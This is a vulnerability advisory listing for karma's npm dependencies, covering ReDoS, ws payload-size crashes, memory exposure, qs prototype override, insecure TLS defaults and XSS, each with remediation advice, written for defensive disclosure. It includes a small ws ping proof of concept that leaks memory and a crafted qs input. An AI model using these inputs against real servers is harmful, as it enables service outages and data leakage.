An attacker can provide a long value in the Accept-Language header, which nearly matches the pattern being matched. This will cause the regular expression matching to take a long time, all the while occupying the thread and preventing it from processing other requests. By repeatedly sending multiple such requests, the attacker can make the server unavailable (a Denial of Service attack).

Details

The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time. [1]

Remediation

Upgrade negotiator to version 0.6.1 or greater.

References

Denial of Service (DoS)

high severity

Detailed paths

  • Introduced through: socket.io@1.3.0 > engine.io@1.5.0 > ws@0.5.0
  • Introduced through: socket.io@1.3.0 > socket.io-client@1.3.0 > engine.io-client@1.5.0 > ws@0.4.31
  • Introduced through: karma@1.3.0 > socket.io@1.4.7 > engine.io@1.6.10 > ws@1.0.1
  • Introduced through: karma@1.3.0 > socket.io@1.4.7 > socket.io-client@1.4.6 > engine.io-client@1.6.9 > ws@1.0.1

Overview

ws is a WebSocket client and server implementation.

Affected versions of this package did not limit the size of an incoming payload before it was processed by default. As a result, a very large payload (over 256MB in size) could lead to a failed allocation and crash the node process - enabling a Denial of Service attack.

While 256MB may seem excessive, note that the attack is likely to be sent from another server, not an end-user computer, using data-center connection speeds. In those speeds, a payload of this size can be transmitted in seconds.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Update to version 1.1.1 or greater, which sets a default maxPayload of 100MB. If you cannot upgrade, apply a Snyk patch, or provide ws with options setting the maxPayload to an appropriate size that is smaller than 256MB.

References

Fixed in 0.13.12

Regular Expression Denial of Service (DoS)

high severity

Detailed paths

  • Introduced through: karma@0.13.11 > minimatch@2.0.10

Overview

minimatch is a minimalistic matching library used for converting glob expressions into JavaScript RegExp objects. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Many Regular Expression implementations may reach edge cases that causes them to work very slowly (exponentially related to input size), allowing an attacker to exploit this and can cause the program to enter these extreme situations by using a specially crafted input and cause the service to excessively consume CPU, resulting in a Denial of Service.

An attacker can provide a long value to the minimatch function, which nearly matches the pattern being matched. This will cause the regular expression matching to take a long time, all the while occupying the event loop and preventing it from processing other requests and making the server unavailable (a Denial of Service attack).

You can read more about Regular Expression Denial of Service (ReDoS) on our blog.

Remediation

Upgrade minimatch to version 3.0.2 or greater.

References

Fixed in 0.13.10

Regular Expression Denial of Service (DoS)

medium severity

Detailed paths

  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > debug@2.1.0 > ms@0.6.2
  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > engine.io@1.5.4 > debug@1.0.3 > ms@0.6.2
  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > socket.io-client@1.3.7 > engine.io-client@1.5.4 > debug@1.0.4 > ms@0.6.2
  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > socket.io-adapter@0.3.1 > debug@1.0.2 > ms@0.6.2

Overview

ms is a tiny milisecond conversion utility.

Affected versions of this package are vulnerable to a Regular expression Denial of Service (ReDoS) attack when converting a time period string (i.e. "2 days", "1h") into milliseconds integer. A malicious user could pas extremely long strings to ms(), causing the server take a long time to process, subsequently blocking the event loop for that extended period.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade ms to version 0.7.1.

If direct dependency upgrade is not possible, use snyk wizard to patch this vulnerability.

References

Remote Memory Exposure

medium severity

Detailed paths

  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > engine.io@1.5.4 > ws@0.8.0
  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > socket.io-client@1.3.7 > engine.io-client@1.5.4 > ws@0.8.0

Overview

ws is a simple to use websocket client, server and console for node.js. Affected versions of the package are vulnerable to Uninitialized Memory Exposure.

A client side memory disclosure vulnerability exists in ping functionality of the ws service. When a client sends a ping request and provides an integer value as ping data, it will result in leaking an uninitialized memory buffer.

This is a result of unobstructed use of the Buffer constructor, whose insecure default constructor increases the odds of memory leakage.

ws's ping function uses the default Buffer constructor as-is, making it easy to append uninitialized memory to an existing list. If the value of the buffer list is exposed to users, it may expose raw memory, potentially holding secrets, private data and code.

Proof of Concept:

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this makes the client allocate an uninitialized buffer of 50 bytes and send it to the server

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data)
  })
})

Details

The Buffer class on Node.js is a mutable array of binary data, and can be initialized with a string, array or number.

const buf1 = new Buffer([1,2,3]);
// creates a buffer containing [01, 02, 03]
const buf2 = new Buffer('test');
// creates a buffer containing ASCII bytes [74, 65, 73, 74]
const buf3 = new Buffer(10);
// creates a buffer of length 10

The first two variants simply create a binary representation of the value it received. The last one, however, pre-allocates a buffer of the specified size, making it a useful buffer, especially when reading data from a stream. When using the number constructor of Buffer, it will allocate the memory, but will not fill it with zeros. Instead, the allocated buffer will hold whatever was in memory at the time. If the buffer is not zeroed by using buf.fill(0), it may leak sensitive information like keys, source code, and system info.

Similar vulnerabilities were discovered in request, mongoose, ws and sequelize.

References

Insecure Defaults

high severity

Detailed paths

  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > socket.io-client@1.3.7 > engine.io-client@1.5.4

Overview

engine.io-client, the client for engine.io and socket.io, disables the core SSL/TLS verification checks by default.

This allows an active attacker, for instance one operating a malicious WiFi, to intercept these encrypted connections using the attacker's spoofed certificate and keys. Doing so compromises the data communicated over this channel, as well as allowing an attacker to impersonate both the server and the client during the live session, sending spoofed data to either side.

Remediation

Update to version 1.6.9 or greater.

If a direct dependency update is not possible, use snyk wizard to patch this vulnerability.

References

Fixed in 0.13.0-rc.9

Uninitialized Memory Exposure

low severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.8 > http-proxy@0.10.4 > utile@0.2.1

Overview

utile is a drop-in replacement for util with some additional advantageous functions.

Affected versions of this package are vulnerable to Uninitialized Memory Exposure. A malicious user could extract sensitive data from uninitialized memory or to cause a DoS by passing in a large number, in setups where typed user input can be passed.

Note Uninitialized Memory Exposure impacts only Node.js 6.x or lower, Denial of Service impacts any Node.js version.

Details

The Buffer class on Node.js is a mutable array of binary data, and can be initialized with a string, array or number.

const buf1 = new Buffer([1,2,3]);
// creates a buffer containing [01, 02, 03]
const buf2 = new Buffer('test');
// creates a buffer containing ASCII bytes [74, 65, 73, 74]
const buf3 = new Buffer(10);
// creates a buffer of length 10

The first two variants simply create a binary representation of the value it received. The last one, however, pre-allocates a buffer of the specified size, making it a useful buffer, especially when reading data from a stream. When using the number constructor of Buffer, it will allocate the memory, but will not fill it with zeros. Instead, the allocated buffer will hold whatever was in memory at the time. If the buffer is not zeroed by using buf.fill(0), it may leak sensitive information like keys, source code, and system info.

Remediation

There is no fix version for utile.

References

Fixed in 0.13.0-rc.4

Prototype Override Protection Bypass

high severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > body-parser@1.13.3 > qs@4.0.0
  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > qs@4.0.0

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

By default qs protects against attacks that attempt to overwrite an object's existing prototype properties, such as toString(), hasOwnProperty(),etc.

From qs documentation:

By default parameters that would overwrite properties on the object prototype are ignored, if you wish to keep the data from those fields either use plainObjects as mentioned above, or set allowPrototypes to true which will allow user input to overwrite those properties. WARNING It is generally a bad idea to enable this option as it can cause problems when attempting to use the properties that have been overwritten. Always be careful with this option.

Overwriting these properties can impact application logic, potentially allowing attackers to work around security controls, modify data, make the application unstable and more.

In versions of the package affected by this vulnerability, it is possible to circumvent this protection and overwrite prototype properties and functions by prefixing the name of the parameter with [ or ]. e.g. qs.parse("]=toString") will return {toString = true}, as a result, calling toString() on the object will throw an exception.

Example:

qs.parse('toString=foo', { allowPrototypes: false })
// {}

qs.parse("]=toString", { allowPrototypes: false })
// {toString = true} <== prototype overwritten

For more information, you can check out our blog.

Disclosure Timeline

  • February 13th, 2017 - Reported the issue to package owner.
  • February 13th, 2017 - Issue acknowledged by package owner.
  • February 16th, 2017 - Partial fix released in versions 6.0.3, 6.1.1, 6.2.2, 6.3.1.
  • March 6th, 2017 - Final fix released in versions 6.4.0,6.3.2, 6.2.3, 6.1.2 and 6.0.4

Remediation

Upgrade qs to version 6.4.0 or higher. Note: The fix was backported to the following versions 6.3.2, 6.2.3, 6.1.2, 6.0.4.

References

Uninitialized Memory Exposure

high severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > express-session@1.11.3 > uid-safe@2.0.0 > base64-url@1.2.1

Overview

base64-url Base64 encode, decode, escape and unescape for URL applications.

Affected versions of this package are vulnerable to Uninitialized Memory Exposure. An attacker may extract sensitive data from uninitialized memory or may cause a DoS by passing in a large number, in setups where typed user input can be passed (e.g. from JSON).

Details

The Buffer class on Node.js is a mutable array of binary data, and can be initialized with a string, array or number.

const buf1 = new Buffer([1,2,3]);
// creates a buffer containing [01, 02, 03]
const buf2 = new Buffer('test');
// creates a buffer containing ASCII bytes [74, 65, 73, 74]
const buf3 = new Buffer(10);
// creates a buffer of length 10

The first two variants simply create a binary representation of the value it received. The last one, however, pre-allocates a buffer of the specified size, making it a useful buffer, especially when reading data from a stream. When using the number constructor of Buffer, it will allocate the memory, but will not fill it with zeros. Instead, the allocated buffer will hold whatever was in memory at the time. If the buffer is not zeroed by using buf.fill(0), it may leak sensitive information like keys, source code, and system info.

Remediation

Upgrade base64-url to version 2.0.0 or higher. Note This is vulnerable only for Node <=4

References

Regular Expression Denial of Service (ReDoS)

high severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > fresh@0.3.0
  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > serve-favicon@2.3.2 > fresh@0.3.0
  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > serve-static@1.10.3 > send@0.13.2 > fresh@0.3.0

Overview

fresh is HTTP response freshness testing.

Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks. A Regular Expression (/ *, */) was used for parsing HTTP headers and take about 2 seconds matching time for 50k characters.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade fresh to version 0.5.2 or higher.

References

Regular Expression Denial of Service (ReDoS)

low severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > serve-static@1.10.3 > send@0.13.2 > mime@1.3.4

Overview

mime is a comprehensive, compact MIME type module.

Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS). It uses regex the following regex /.*[\.\/\\]/ in its lookup, which can cause a slowdown of 2 seconds for 50k characters.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Many Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size), allowing an attacker to exploit this and can cause the program to enter these extreme situations by using a specially crafted input and cause the service to excessively consume CPU, resulting in a Denial of Service.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade mime to versions 1.4.1, 2.0.3 or higher.

References

Fixed in 0.13.0-rc.2

Information Exposure

low severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > connect@2.26.6 > serve-static@1.6.5

Overview

serve-static is a Node.js module available through the npm registry.

Affected versions of this package are vulnerable to Information Exposure. The roots path would be exposed via the express.static, res.sendfile, and res.sendFile methods.

Recommendations

Upgrade serve-static to version 1.8.1 or higher.

References

Regular Expression Denial of Service (ReDoS)

high severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > useragent@2.0.10

Overview

useragent allows you to parse user agent string with high accuracy by using hand tuned dedicated regular expressions for browser matching.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. A malicious user could cause the server to block by editing the request headers with an arbitrarily long useragent string.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Update useragent to version 2.1.12 or higher.

References

Cross-site Scripting due to improper file and directory names escaping

medium severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > connect@2.26.6 > serve-index@1.2.1

Overview

serve-index Serves pages that contain directory listings for a given path.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) attacks. When using serve-index middleware, file and directory names are not escaped in HTML output. If a remote attcker can influence these names, it may trigger a persistent XSS attack.

Details

Cross-Site Scripting (XSS) attacks occur when an attacker tricks a user’s browser to execute malicious JavaScript code in the context of a victim’s domain. Such scripts can steal the user’s session cookies for the domain, scrape or modify its content, and perform or modify actions on the user’s behalf, actions typically blocked by the browser’s Same Origin Policy.

These attacks are possible by escaping the context of the web application and injecting malicious scripts in an otherwise trusted website. These scripts can introduce additional attributes (say, a "new" option in a dropdown list or a new link to a malicious site) and can potentially execute code on the clients side, unbeknown to the victim. This occurs when characters like \< > \" \' are not escaped properly.

There are a few types of XSS:

  • Persistent XSS is an attack in which the malicious code persists into the web app’s database.
  • Reflected XSS is an which the website echoes back a portion of the request. The attacker needs to trick the user into clicking a malicious link (for instance through a phishing email or malicious JS on another page), which triggers the XSS attack.
  • DOM-based XSS is an that occurs purely in the browser when client-side JavaScript echoes back a portion of the URL onto the page. DOM-Based XSS is notoriously hard to detect, as the server never gets a chance to see the attack taking place.

Remediation

Upgrade to version 1.6.3 or greater

References

Regular Expression Denial of Service (ReDoS)

medium severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > useragent@2.0.10

Overview

useragent is an user agent string parser, uses Browserscope's research for parsing.

Affected versions of the package are vulnerable to Regular Expression Denial of Service (ReDoS).

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade useragent to version 2.1.13 or higher.

References

Regular Expression Denial of Service (ReDoS)

high severity
  • Vulnerable module: method-override
  • Introduced through: connect@2.26.6

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > connect@2.26.6 > method-override@2.2.0

Overview

method-override is a module to override HTTP verbs.

Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS). It uses regex the following regex / *, */ in order to split HTTP headers. An attacker may send specially crafted input in the X-HTTP-Method-Override header and cause a significant slowdown.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade method-override to version 2.3.10 or higher.

References

Root Path Disclosure

medium severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > connect@2.26.6 > serve-static@1.6.5 > send@0.9.3

Overview

Send is a library for streaming files from the file system as an http response. It supports partial responses (Ranges), conditional-GET negotiation, high test coverage, and granular events which may be leveraged to take appropriate actions in your application or framework.

Affected versions of this package are vulnerable to a Root Path Disclosure.

Remediation

